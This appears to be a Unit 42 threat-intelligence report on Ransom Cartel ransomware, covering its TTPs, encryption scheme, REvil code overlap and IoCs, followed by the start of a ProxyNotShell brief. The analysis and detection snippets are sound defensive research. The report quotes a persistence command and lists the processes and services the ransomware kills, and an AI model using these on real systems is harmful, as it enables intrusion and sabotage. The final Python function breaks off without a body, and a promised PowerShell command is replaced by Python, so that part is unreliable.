Ransom Cartel typically gains initial access to an environment via compromised credentials, which is one of the most common vectors for initial access for ransomware operators. This includes access credentials for external remote services, remote desktop protocol (RDP), secure shell protocol (SSH) and virtual private networks (VPNs). These credentials are widely available in the cyber underground and offer threat actors a reliable means to gain access to victims' corporate networks.

These credentials can also be obtained through the work of ransomware operators themselves or by purchasing them from an initial access broker.

Initial access brokers are actors who offer to sell compromised network access. Their motivation is not to carry out cyberattacks themselves but rather to sell the access to other threat actors. Due to the profitability of ransomware, these brokers likely have working relationships with RaaS groups based on the amount they are willing to pay.

Unit 42 has seen evidence that Ransom Cartel has relied on this type of service to gain initial access for ransomware deployment.

Unit 42 has also observed Ransom Cartel encrypting both Windows and Linux VMware ESXi servers in attacks on corporate networks.

Tactics, Techniques and Procedures Observed During Ransom Cartel Attacks

Unit 42 observed a Ransom Cartel threat actor using a tool called DonPAPI, which has not been observed in past incidents. This tool can locate and retrieve Windows Data Protection API (DPAPI) protected credentials, which is known as DPAPI dumping.

DonPAPI is used to search machines for certain files known to be DPAPI blobs, including Wi-Fi keys, RDP passwords and credentials saved in web browsers. To avoid the risk of detection by antivirus (AV) or endpoint detection and response (EDR) software, the tool downloads the files and decrypts them locally. To compromise Linux ESXi devices, Ransom Cartel uses DonPAPI to harvest credentials stored in web browsers used to authenticate to the vCenter web interface.

We also observed the threat actor using additional tools, including LaZagne to recover credentials stored locally and Mimikatz to steal credentials from host memory.

In order to establish persistent access to Linux ESXi devices, the threat actor enables SSH after authenticating to vCenter. The threat actor then creates new accounts and sets each account’s user identifier (UID) to zero. On Unix/Linux systems, UID 0 is root, which means any security checks are bypassed for these accounts.
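From a defender's point of view, the UID manipulation described above can be hunted for by listing every account other than root whose UID is 0. The following is a minimal Python sketch under the assumption that the host uses the standard colon-separated passwd format; the function name uid_zero_accounts and the sample account names are hypothetical and not taken from any observed incident.

```python
from typing import List


def uid_zero_accounts(passwd_text: str) -> List[str]:
    """Return account names (other than root) whose UID field is 0.

    Expects the standard passwd layout: name:password:UID:GID:...
    """
    suspicious = []
    for line in passwd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        fields = line.split(":")
        if len(fields) < 3:
            continue  # malformed entry, ignore
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            suspicious.append(name)
    return suspicious
```

On a live system the input would typically be the contents of /etc/passwd. Any name returned deserves review, since a legitimate configuration rarely needs a second UID 0 account.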

The threat actor was observed downloading and using a cracked version of PDQ Inventory, a legitimate system management solution that IT administrators use to scan their network and collect hardware, software and Windows configuration data. Ransom Cartel used this as a remote access tool to establish an interactive command and control channel and to scan the compromised network.

Once a VMware ESXi server is compromised, the threat actor launches the encryptor, which will automatically enumerate the running virtual machines (VMs) and shut them down using the esxcli command. Terminating the VM processes ensures that the ransomware can successfully encrypt VMware-related files.

During encryption, Ransom Cartel specifically seeks out files with the following file extensions: .log, .vmdk, .vmem, .vswp and .vmsn. These extensions are associated with ESXi snapshots, log files, swap files, paging files and virtual disks. Post-encryption, the following file extensions have been observed: .zmi5z, .nwixz, .ext, .zje2m, .5vm8t and .m4tzt.
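The two extension lists above lend themselves to a simple triage helper. The Python sketch below labels a file path as already carrying one of the observed post-encryption extensions, as belonging to a targeted file type, or as neither. The function name classify_path and the example paths are hypothetical. The observed extensions appear to be random per incident, so a match (particularly on .ext) is only a hint, not proof of Ransom Cartel activity.

```python
from pathlib import PurePosixPath
from typing import Optional

# Extensions the encryptor seeks out on ESXi, as listed in the text.
TARGETED_EXTENSIONS = {".log", ".vmdk", ".vmem", ".vswp", ".vmsn"}

# Post-encryption extensions observed so far, as listed in the text.
OBSERVED_ENCRYPTED_EXTENSIONS = {
    ".zmi5z", ".nwixz", ".ext", ".zje2m", ".5vm8t", ".m4tzt",
}


def classify_path(path: str) -> Optional[str]:
    """Return 'encrypted', 'targeted' or None based on the final extension."""
    suffix = PurePosixPath(path).suffix.lower()
    if suffix in OBSERVED_ENCRYPTED_EXTENSIONS:
        return "encrypted"
    if suffix in TARGETED_EXTENSIONS:
        return "targeted"
    return None
```

Checking the observed extensions first means a file such as vm1.vmdk.zmi5z is reported as encrypted rather than merely targeted.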

Ransom Notes

Unit 42 has observed two different versions of ransom notes sent by Ransom Cartel. The first note was first observed around January 2022, and the other one first appeared in August 2022. The second version appeared to be completely rewritten, as shown in Figure 1.

Side-by-side comparison of two Ransom Cartel notes. The note on the left, first observed in January 2022, includes the following sections: What's Happen, What Guarantee, How to get access on website? A section at the bottom titled "Danger" warns against attempting to restore data. The note on the right, first observed in August 2022, is longer and includes the following sections: What's going on?, What are the guarantees?, How to get access on website? A section at the bottom titled "Attention" warns against trying to restore data yourself. The note warns about involving third parties throughout.
Figure 1. Ransom Cartel ransom notes. The note on the left was first observed in January 2022; the note on the right was first observed in August 2022.

It's interesting to note that the structure of the first ransom note used by Ransom Cartel shares similarities with a ransom note sent by REvil, as shown in Figure 2. In addition to the use of similar wording, both notes employed the same format of a 16-byte hexadecimal string for the UID.

The structure of a ransom note sent by Ransom Cartel (shown on the left) shares similarities with a ransom note sent by REvil (shown on the right). In addition to similar wording and section structures, both notes employed the same format of a 16-byte hexadecimal string for the UID.
Figure 2. Ransom Cartel ransom note shown on the left, compared to a ransom note sent by REvil shown on the right.

Ransom Cartel TOR Site

Ransom Cartel’s website for communication with victims was available via a TOR link provided in the ransom note. We’ve observed multiple TOR URLs belonging to Ransom Cartel, which likely indicates that they had been changing infrastructure and actively developing their website. A TOR private key is needed to access the website.

When the key is entered, the following page is loaded:

Ransom Cartel TOR site landing page, including a large purple "Authorization" button under the words "Ransom Cartel."
Figure 3. Ransom Cartel TOR site landing page.

Upon entering the TOR site through the Authorization button, the user is shown a screen requesting the details included in the ransom note.

Once the user clicks the authorization button on the landing page, this page is shown. Under the header "Authorization," it requests ID and key and offers options to log in or cancel.
Figure 4. Ransom Cartel website, requesting the ID and key provided in the ransom note.

Once authorization is completed on the TOR site, the page shown in Figure 5 appears. The site includes details such as ransom demand, in both US dollars and bitcoin, and the Bitcoin wallet address.

The Ransom Cartel TOR site after login includes sections titled "Information," "Chat Support" and "Trial decrypt: Limit 3." A dashboard includes explanations of the threat actors' desired process as well as info on ransom status, time to pay and currency demanded. The threat actors' Bitcoin wallet is also shown.
Figure 5. Ransom Cartel TOR site.

Technical Details

Two Ransom Cartel samples were used during this analysis:

File one SHA256: 55e4d509de5b0f1ea888ff87eb0d190c328a559d7cc5653c46947e57c0f01ec5
File two SHA256: 2411a74b343bbe51b2243985d5edaaabe2ba70e0c923305353037d1f442a91f5

Both of the samples contained three total exports:

Rathbuige
ServiceMain
SvchostPushServiceGlobals

The samples also contain a DllEntryPoint, should the DLL be executed without specifying an export. The DllEntryPoint leads to a function that iterates over a call to the Curve25519 Donna algorithm 24 times. Once the iteration ends, the sample will query the system metrics, specifically for the SM_CLEANBOOT value. If this value is anything other than 0, the ransomware will proceed to spawn another instance of itself via rundll32.exe, specifying the Rathbuige export.

SM_CLEANBOOT Values Description
0 Normal Boot
1 Fail-Safe Boot
2 Fail-Safe with Network Boot

Table 1. SM_CLEANBOOT values.
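For readers who want to see the same value on their own host, the Python sketch below queries it through the documented GetSystemMetrics API, where SM_CLEANBOOT is index 67, and maps the result to the descriptions in Table 1. The function names are hypothetical. The sketch only reports the boot mode and does not reproduce anything the sample does afterwards.

```python
import ctypes
import sys
from typing import Optional

SM_CLEANBOOT = 67  # system metric index defined in the Windows SDK

# Descriptions taken from Table 1.
BOOT_MODES = {
    0: "Normal Boot",
    1: "Fail-Safe Boot",
    2: "Fail-Safe with Network Boot",
}


def describe_boot_mode(value: int) -> str:
    """Translate an SM_CLEANBOOT value into its Table 1 description."""
    return BOOT_MODES.get(value, "Unknown value %d" % value)


def current_boot_mode() -> Optional[int]:
    """Return the SM_CLEANBOOT value, or None when not running on Windows."""
    if sys.platform != "win32":
        return None
    return ctypes.windll.user32.GetSystemMetrics(SM_CLEANBOOT)
```

On Windows, describe_boot_mode(current_boot_mode()) returns the description of the current boot mode; on other platforms current_boot_mode() returns None.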

The Rathbuige export starts by creating the following mutex:

Global\\266ee996-e1ac-4eaa-9bdb-0b639d41b32d

Once the mutex is created, the sample begins to decrypt and parse its embedded configuration. The configuration is stored as a base64-encoded blob, whereby the first 16 bytes of the base64-encoded blob are the RC4 key used for decrypting the rest of the blob once it has been decoded.
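The decoding steps can be sketched in a few lines of Python. This is an illustration under stated assumptions rather than a reimplementation of the sample: it assumes the 16-byte RC4 key is taken from the start of the blob after base64 decoding, and that the decrypted remainder is clean UTF-8 JSON. The function names rc4 and decode_config are hypothetical.

```python
import base64
import json


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by keystream XOR."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)


def decode_config(blob_b64: str) -> dict:
    """Base64-decode the blob, split off the key and decrypt the rest.

    Assumption: bytes 0..15 of the decoded blob are the RC4 key.
    """
    raw = base64.b64decode(blob_b64)
    key, body = raw[:16], raw[16:]
    return json.loads(rc4(key, body).decode("utf-8"))
```

Because RC4 is symmetric, the same rc4 function can be used to build test blobs when validating the decoder against known plaintext.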

Ransom Cartel encrypted configuration. Once the mutex is created, the sample begins to decrypt and parse its embedded configuration.
Figure 6. Ransom Cartel encrypted configuration.

Once decrypted, the configuration is stored in JSON format and consists of information such as encrypted file extension, the threat actors' public Curve25519-donna key, a base64-encoded ransom note, and a list of processes and services to terminate prior to encryption.

Once decrypted, the configuration is stored in JSON format as shown in this example and consists of information such as encrypted file extension, the threat actors' public Curve25519-donna key, a base64-encoded ransom note, and a list of processes and services to terminate prior to encryption.
Figure 7. Example of decrypted Ransom Cartel configuration.

A breakdown of the keys and their values within the configuration can be seen in Table 2.

Configuration Key Value
pk Attacker public key
dbg Debug mode
wht Allow listed items

  • Folders to avoid
  • Files to avoid
  • Extensions to avoid
prc Processes to terminate
svc Services to terminate
nname Name of ransom note file
nbody Ransom note content
ext Encrypted file extension

Table 2. Configuration structure.

dbsnmp raw_agent_svc onenote steam
VeeamNFSSvc synctime infopath msaccess
tbirdconfig mspub ocomm excel
EnterpriseClient ocssd agntsvc winword
ocautoupds thebat sql bedbh
dbeng50 powerpnt wordpad xfssvccon
VeeamTransportSvc CagService bengien visio
outlook DellSystemDetect encsvc benetns
pvlsvr isqlplussvc VeeamDeploymentSvc vsnapvss
sqbcoreservice firefox mydesktopservice oracle
mydesktopqos beserver thunderbird vxmon

Table 3. Targeted process list.

BackupExecVSSProvider BackupExecManagementService AcronisAgent
veeam VeeamDeploymentService ARSM
BackupExecAgentAccelerator MSExchange$ PDVFSService
MSSQL$ VeeamTransportSvc memtas
MSExchange vss stc_raw_agent
BackupExecDiveciMediaService CAARCUpdateSvc mepocs
svc$ WSBExchange sophos
VSNAPVSS MVarmor64 MSSQL
sql BackupExecRPCService backup
MVArmor BackupExecAgentBrowser VeeamNFSSvc
BackupExecJobEngine CASAD2DWebSvc bedbg
AcrSch2Svc

Table 4. Targeted service list.

mod cpl ps1
cab com ani
diagcab adv themepack
shs sys rom
cur ldf msu
mpa spl msi
msc wpx 386
diagcfg lock prf
deskthemepack bin ico
diagpkg nomedia idx
ics hlp msp
msstyles key cmd
scr exe drv
hta nls dll
lnk icns ocx
theme bat icl
rtp

Table 5. Avoided extensions.

Following decryption of the configuration, certain system information is gathered, including the username, computer name, domain name, locale and product name. This information is then formatted into the following JSON structure:

{"ver":%d,"pk":"%s","uid":"%s","sk":"%s","unm":"%s","net":"%s","grp":"%s","lng":"%s","bro":%s,"os":"%s","bit":%d,"dsk":"%s","ext":"%s"}

Table 6 describes the purpose of each key within the structure.

Key Value
ver Version of the ransomware, hardcoded. In both samples set to 0x65 (101)
pk Public key found within the configuration
uid Unique identifier calculated via CRC-32 hashing certain machine information
sk Encoded session secret
unm Username
net Computer name
grp Computer domain
lng Computer locale
bro Does keyboard locale match any hardcoded locale value – true/false
os Product name
bit System architecture
dsk Disk information
ext Ransomware extension

Table 6. Hardcoded JSON format keys and values.

Once the gathered data has been formatted into the JSON structure, it is then encrypted using the same procedure that Ransom Cartel follows to generate session_secret blobs, which will be discussed shortly; put simply, it involves AES encryption, utilizing the SHA3 hash of a Curve25519 shared key for the AES key.

Once encrypted, it is written to the registry key SOFTWARE\\Google_Authenticator\\b52dKMhj, with the sample first attempting to write to the HKEY_LOCAL_MACHINE hive, before writing to HKEY_CURRENT_USER if the right permissions are not possessed. Once the data has been written to the registry, it is then base64-encoded and embedded within the ransom note, replacing the {KEY} placeholder.

Once the configuration has been parsed and stored within the registry, the command line provided to the ransomware is parsed. There are a total of five possible arguments, as shown in Table 7.

Argument Description
-nolan Instruct the sample not to attempt any form of network drive encryption
-nolocal Prevent the encryption of all local volumes
-path Target specific file path to encrypt
-silent Appears to instruct the ransomware to avoid terminating running processes and services, and it begins encrypting files immediately
-smode Causes the ransomware to use BCDEdit in order to enable Safe Boot; check out this article on REvil’s use of “Windows Safe Mode” encryption for a discussion about this particular technique.

Table 7. Ransom Cartel accepted arguments.

With that, let’s move on to analyzing the session secret generation procedure.

Ransom Cartel first checks to see if the registry already contains previously generated values; if so, it will read those values into memory. Otherwise, it will generate a total of two session secrets at runtime, with each secret containing 88 bytes of data.

First, a public and private key pair will be generated using the code from this Curve25519 repository (session_public_1 and session_private_1). When generating the first session secret, another session key pair is generated (session_public_2 and session_private_2), and session_private_2 is paired with attacker_cfg_public (the public key embedded within the configuration) to generate a shared key. This shared key is then hashed with the SHA3 hashing algorithm. The resulting hash is used as an AES key with a random 16-byte initialization vector (IV) for encrypting a data blob consisting of four null bytes followed by session_private_1.

Session secret generation procedure. The diagram maps out how session keys are generated and what names they receive, how secondary session keys are generated and what names they receive, how AES encrypt is used, how shared key hashes are generated and the names they receive, and how the various elements are put together to create session_secret_1.
Figure 8. Diagram of session secret generation procedure.

From there, the encrypted blob is hashed using CRC-32, and then appended with the values session_public_2, the AES IV, and the calculated CRC-32 hash. The resulting value is session_secret_1. The second generated session secret follows the exact same procedure; however, instead of using attacker_cfg_public, it utilizes an embedded public key (attacker_embedded_public_1) within the binary to generate the shared key.

Session secret generation procedure once decompiled. This shows how the encrypted blob is hashed using CRC-32, and then appended with the values session_public_2, the AES IV, and the calculated CRC-32 hash. At the end of the code snippet shown, the session_secret is returned.
Figure 9. Decompiled session secret generation procedure.

One final embedded public key (attacker_embedded_public_2) is used to encrypt the data formatted into the JSON structure described above.

This method of generating session secrets was documented by researchers at Amossys back in 2020; however, their analysis focused on an updated version of Sodinokibi/REvil ransomware, indicating a direct overlap between the REvil source code and the latest Ransom Cartel samples.

Once the session secrets have been generated, they are written to the registry, alongside session_public_1 and attacker_cfg_public.

Path Name Value
SOFTWARE\\Google_Authenticator\\ WRZfsL attacker_cfg_public
SOFTWARE\\Google_Authenticator\\ RB4y session_public_1
SOFTWARE\\Google_Authenticator\\ Kbcn0 session_secret_1
SOFTWARE\\Google_Authenticator\\ BSjHn session_secret_2

Table 8. Registry paths and values used by Ransom Cartel.

At this point, all the required information is gathered and generated so that file encryption can begin.

For each file, a unique file public and private key pair is generated (file_public_1 and file_private_1), once again using Curve25519 Donna. file_private_1 and session_public_1 are paired together to generate a shared key, which is hashed using SHA3. The generated hash is used as the encryption key for Salsa20 (a symmetric encryption algorithm), and a random eight-byte nonce is generated using CryptGenRandom. The CRC-32 hash of file_public_1 is calculated, and then four null bytes are encrypted using the generated Salsa20 matrix.

Certain elements of the above data are then retained and used as part of the encrypted file footer; each file footer is 232 bytes in length and is made up of the following:

  • session_secret_1 (88 bytes)
  • session_secret_2 (88 bytes)
  • file_public_1 (32 bytes)
  • salsa_nonce (eight bytes)
  • crc_file_public_1 (four bytes)
  • encryption_type (four bytes)
  • block_spacing (four bytes)
  • encrypted_null (four bytes)

Similarly to the session_secret generation, this structure is identical to that of the REvil samples analyzed by Amossys, further showing that there have been very few changes to the REvil source code when developing Ransom Cartel samples.

The code snippet shows the structure of the file encryption setup process, which is similar to REvil samples.
Figure 10. File encryption setup process.

Ransom Cartel and REvil Code Comparison

The Ransom Cartel samples analyzed revealed similarities with REvil ransomware.

The first notable similarity between Ransom Cartel and REvil is the structure of the configuration. Examining a sample of REvil from 2019 (SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3), the resemblance can be seen. However, the storage of the encrypted configuration is slightly different, opting to store the configuration in a separate section within the binary (.ycpc19), with an initial 32-byte RC4 key followed by the raw encrypted configuration, whereas with the Ransom Cartel samples, the configuration is stored within the .data section as a base64-encoded blob.

Code snippet showing REvil configuration storage, which differs slightly from Ransom Cartel encryption storage.
Figure 11. REvil configuration storage.

Once the REvil configuration has been decrypted, it utilizes the same JSON format, but contains additional values such as pid, sub, fast, wipe and dmn. These values indicate additional functionality within the REvil sample, which could mean that either the Ransom Cartel developers removed certain functionality or they are building off of a much earlier version of REvil.

This shows how the REvil configuration once decrypted uses the same JSON format as Ransom Cartel, but contains additional values such as pid, sub, fast, wipe and dmn.
Figure 12. Decrypted REvil configuration.

As discussed previously, another major overlap is the code reuse across the two samples of Ransom Cartel. Both use an identical encryption scheme, generating multiple public/private key pairs, and creating session secrets using the same procedure found within REvil samples.

The REvil session secret generation function, shown in the code snippet, is identical to that of Ransom Cartel.
Figure 13. REvil session secret generation function.

Both use Salsa20 and Curve25519 for file encryption, and there are very few differences in the layout of the encryption routine besides the structure of the internal type structs.

REvil file encryption setup function, which has very few differences in the layout of the encryption routine as compared to Ransom Cartel.
Figure 14. REvil file encryption setup function.

A particularly interesting difference between the two malware families is that REvil opts to obfuscate their ransomware much more heavily than the Ransom Cartel group, utilizing string encryption, API hashing and more, while Ransom Cartel has almost no obfuscation outside of the configuration, hinting that the group may not possess the obfuscation engine used by REvil.

It is possible that the Ransom Cartel group is an offshoot of the original REvil threat actor group, where the individuals only possess the original source code of the REvil ransomware encryptor/decryptor, but do not have access to the obfuscation engine.

Ransom Cartel Tactics, Techniques and Procedures

Below is a list of TTPs observed being used by Ransom Cartel affiliates:

TTPs Notes
TA0001 Initial Access
T1078. Valid Accounts Uses legitimate VPN, RDP, Citrix or VNC credentials to maintain access to an environment.
T1133. External Remote Services Uses legitimate VPN or Citrix credentials to maintain access to an environment.
TA0002 Execution
T1072. Software Deployment Tools Deploys PDQ Inventory Scanner tool.
T1059.001. Command and Scripting Interpreter: PowerShell Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.
T1059.003. Command and Scripting Interpreter: Windows Command Shell Uses cmd.exe to execute commands.
TA0003 Persistence
T1003.008. OS Credential Dumping: /etc/passwd and /etc/shadow Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.
T1136.001. Create Account: Local Account Creates new user accounts.
T1098. Account Manipulation Adds newly created accounts to the administrators group to maintain elevated access.
T1547.001. Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder Adds registry run keys to achieve persistence. In some cases, we observed the use of the following command:
start cmd.exe /k runonce.exe /AlternateShellStartup
T1197. BITS Jobs Uses BITSAdmin to download and install payloads.
TA0004 Privilege Escalation
T1068. Exploitation for Privilege Escalation Exploits Print Nightmare vulnerability.
TA0005 Defense Evasion
T1222.002. File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification Uses the chmod +x command to grant executable permissions to the ransomware.
T1112. Modify Registry Modifies the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1.
T1070.001. Indicator Removal on Host: Clear Windows Event Logs Uses wevtutil to clear the Windows event logs.
T1218.011. System Binary Proxy Execution: Rundll32 Uses Rundll32 to load and execute malicious DLL.
T1562.004. Impair Defenses: Disable or Modify System Firewall Deletes rules in the Windows Defender Firewall exception list related to AnyDesk.
T1070.004. Indicator Removal on Host: File Deletion Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe and ssh.exe.
T1070.003. Indicator Removal on Host: Clear Command History Clears Windows PowerShell and WitnessClientAdmin log file.
T1027. Obfuscated Files or Information Uses encoded PowerShell commands.
TA0006 Credential Access
T1003.001. OS Credential Dumping: LSASS Memory Uses Mimikatz to harvest credentials.
T1555.003. Credentials from Password Stores: Credentials from Web Browsers Compromises users’ saved passwords from browsers.
TA0007 Discovery
T1046. Network Service Discovery Uses tools such as PDQ Inventory scanner, Advanced Port Scanner and netscan (which also scanned for the ProxyShell vulnerability).
T1083. File and Directory Discovery Searches for specific files prior to encryption.
T1135. Network Share Discovery Enumerates remote open SMB network shares.
T1087.001. Account Discovery: Local Account Accesses ntuser.dat and /etc/passwd to enumerate all accounts.
TA0008 Lateral Movement
T1021.004. Remote Services: SSH Uses Putty for remote access.
T1550.002. Use Alternate Authentication Material: Pass the Hash Dumps password hashes for use in pass the hash authentication attacks.
T1021.001. Remote Services: Remote Desktop Protocol Uses RDP for lateral movement.
TA0009 Collection
T1560.001. Archive Collected Data: Archive via Utility Uses 7-Zip to compress stolen data for exfiltration.
TA0010 Exfiltration
T1567.002. Exfiltration Over Web Service: Exfiltration to Cloud Storage Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync).
TA0011 Command and Control
T1219. Remote Access Software Uses AnyDesk to remotely connect and transfer files.
T1090.003. Proxy: Multi-hop Proxy Routes traffic over TOR and VPN servers to obfuscate their activities.
T1105. Ingress Tool Transfer Downloads and uploads files to and from the victim’s machine.
TA0040 Impact
T1486. Data Encrypted for Impact Encrypts system data and adds the random extension to encrypted files. The following extensions have been observed (.zmi5z, .nwixz, .ext, .zje2m, .5vm8t, .m4tzt).

Table 9. Tactics, techniques and procedures for Ransom Cartel activity.

Malware, Tools and Exploits Used

Tactic Tools
Execution PowerShell, Windows command shell
Credential Access Mimikatz, LaZagne, DonPAPI
Discovery PDQ Inventory scanner, Advanced Port Scanner, netscan.exe
Privilege Escalation Print Nightmare
Lateral Movement Putty
Command and Control AnyDesk, Cobalt Strike
Exfiltration Rclone

Table 10. Malware, tools and exploits used.

Conclusion

Ransom Cartel is one of many ransomware families that surfaced during 2021. While Ransom Cartel uses double extortion and some of the same TTPs we often observe during ransomware attacks, this type of ransomware uses less common tools – DonPAPI for example – that we haven’t observed in any other ransomware attacks.

Based on the fact that the Ransom Cartel operators clearly have access to the original REvil ransomware source code, yet likely do not possess the obfuscation engine used to encrypt strings and hide API calls, we speculate that the operators of Ransom Cartel had a relationship with the REvil group at one point, before starting their own operation.

Due to the high-profile nature of some organizations targeted by Ransom Cartel and the steady stream of Ransom Cartel cases identified by Unit 42, the operator and/or affiliates behind the ransomware will likely continue to attack and extort organizations.

Palo Alto Networks customers receive help with detection and prevention of Ransom Cartel ransomware in the following ways:

  • WildFire: All known samples are identified as malware.
  • Cortex XDR:
    • Identifies indicators associated with Ransom Cartel.
    • Anti-Ransomware Module to detect Ransom Cartel encryption behaviors on Windows.
    • Local Analysis detection for Ransom Cartel binaries on Windows.
  • Next-Generation Firewalls: DNS Signatures detect the known command and control domains, which are also categorized as malware in Advanced URL Filtering.

If you think you may have been compromised or have an urgent matter, you can get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Ransom Cartel Samples

9935DA29F3E4E503E4A4712379CCD9963A730CCC304C2FEC31E8276DB35E82E8
BF93B029CCA0DE4B6F32E98AEEBD8FD690964816978A0EB13A085A80D4B6BF4E
55e4d509de5b0f1ea888ff87eb0d190c328a559d7cc5653c46947e57c0f01ec5
2411a74b343bbe51b2243985d5edaaabe2ba70e0c923305353037d1f442a91f5

Network-based IoCs

185.239.222[.]240 TOR Exit Node
108.62.103[.]193 TOR Exit Node
185.129.62[.]62 TOR Exit Node
185.143.223[.]13 Bulletproof hosting server
185.253.163[.]23 PIA VPN exit node

Indicators of compromise and Ransom Cartel-associated TTPs can be found in the Ransom Cartel ATOM.

Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Updated Oct. 15, 2022, at 11:15 a.m. PT.

Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)

Executive Summary

In early August, GTSC discovered a new Microsoft Exchange zero-day remote code execution (RCE) that was very similar to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).

The exploit was discovered in the wild in what appeared to be a SOC investigation into suspicious activity of one of GTSC’s customers. Once they determined the scope of the vulnerabilities, GTSC reported the vulnerability to the Zero-day Initiative (ZDI) to enable further coordination with Microsoft. The vulnerabilities were assigned CVE-2022-41040 and CVE-2022-41082 and rated with severities of critical and important respectively. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.

The exploit does require authentication; however, the authentication required is that of a standard user and, based on how easy it is to collect user credentials these days, this is not a high bar to overcome. Microsoft has yet to release a patch for these vulnerabilities. In the meantime, they provided mitigations in a blog responding to GTSC’s disclosure of these vulnerabilities.

Palo Alto Networks customers receive protections from and mitigations for ProxyNotShell in the following ways:

  • Next-Generation Firewalls or Prisma Access with a Threat Prevention security subscription can block sessions related to CVE-2022-41040.
  • A Cortex XSOAR response pack and playbook can automate the mitigation process.
  • Cortex Xpanse can help identify and detect Microsoft Exchange servers that may be a part of your attack surface.
  • Cortex XDR will report related exploitation attempts.
  • XQL queries provided below can be used with Cortex XDR to help track attempts to exploit these CVEs.
  • Malicious URLs and IPs have been added to Advanced URL Filtering.
  • The Unit 42 Incident Response team can provide personalized assistance.

For more details, please see the conclusion.

Vulnerabilities Discussed CVE-2022-41040, CVE-2022-41082

Details of the Vulnerabilities

GTSC’s SOC discovered the following URL requests in a customer’s Microsoft Internet Information Services (IIS) logs:

The URL requests shown were discovered in a GTSC customer's Microsoft Internet Information Services logs and appear to be identical to ProxyShell requests seen last year.

The URL requests appear to be identical to the ProxyShell requests seen last year. Compare the above request with the following excerpt from Mandiant’s blog reporting on the discovery of ProxyShell last year, and you’d think this must be an unpatched server exploited by ProxyShell.

Excerpt from Mandiant's blog reporting on the discovery of ProxyShell last year. Note the similarity between the requests shown and what was seen with ProxyNotShell.

GTSC reviewed the Exchange server version and confirmed the Exchange servers were up to date and the vulnerabilities were indeed new zero days. GTSC also confirmed the attackers were able to get PowerShell execution during the attack. This also resembles ProxyShell. Once attackers gained access to the server, they installed webshells to obtain persistent access to the network. GTSC reported the vulnerability to the Zero-day Initiative (ZDI) to enable further coordination with Microsoft. The vulnerabilities were assigned CVE-2022-41040 and CVE-2022-41082 and rated with severities of critical and important respectively. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.

Please refer to GTSC’s excellent blog for details on the webshells, malware analysis, indicators of compromise (IoCs) and commands discovered during their investigation. Microsoft has stated that the vulnerabilities affect Microsoft Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019. They also state that “Exchange Online has detections and mitigations to protect customers. As always, Microsoft is monitoring these detections for malicious activity and we’ll respond accordingly if necessary to protect customers.”

Current Scope of the Attack

It does appear there are multiple victims of this attack. However, from what has been publicly reported, the attacks still seem to remain isolated. GTSC stated in their blog, “GTSC's direct incident response process recorded more than one organization being the victims of an attack campaign exploiting this 0-day vulnerability.”

Microsoft, in a blog response to GTSC’s, stated “MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks.”

The attacks observed by both GTSC and Microsoft used the China Chopper webshell, and Microsoft’s MSTIC attributes the attacks, with medium confidence, to one attack group. Although the attacks still appear to be isolated, based on the history of ProxyShell and the difficulty of patching Exchange servers, we believe this vulnerability will garner widespread attention from threat groups. Therefore, we expect working exploits and proofs of concept (PoCs) will soon be available to aid in the exploitation of these vulnerabilities. That being said, Unit 42 has not yet seen any evidence of attempted exploitation within our customer telemetry.

Interim Guidance

Microsoft has yet to release a patch for these vulnerabilities. In the meantime, they provided mitigations that rely on the usage of a URL Rewrite rule to identify and block exploitation attempts as well as disabling remote PowerShell access for non-admins.

GTSC provided the same guidance in their blog as well. If you feel you may have been targeted and keep IIS logs, GTSC recommends running the following PowerShell command to search for evidence of attempted exploitation of your Exchange servers:
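
For readers who prefer to script this kind of log search, here is a minimal Python sketch that walks a directory of IIS logs and yields lines resembling the exploitation requests. The regular expression is an assumption modeled on the request shape publicly reported for this exploit chain (an autodiscover.json request that references PowerShell and returns HTTP 200), and the function names are hypothetical. Confirm the pattern against GTSC's and Microsoft's current guidance before relying on it.

```python
import re
from pathlib import Path
from typing import Iterable, Iterator, Tuple

# Assumed pattern: "powershell", then "autodiscover.json", then "@",
# then a 200 status code later on the same log line.
SUSPICIOUS = re.compile(r"powershell.*autodiscover\.json.*@.*200", re.IGNORECASE)


def find_suspicious_lines(lines: Iterable[str]) -> Iterator[str]:
    """Yield log lines that match the assumed exploitation pattern."""
    for line in lines:
        if line.startswith("#"):  # skip IIS header lines such as "#Fields:"
            continue
        if SUSPICIOUS.search(line):
            yield line.rstrip("\n")


def scan_log_dir(log_dir: str) -> Iterator[Tuple[str, str]]:
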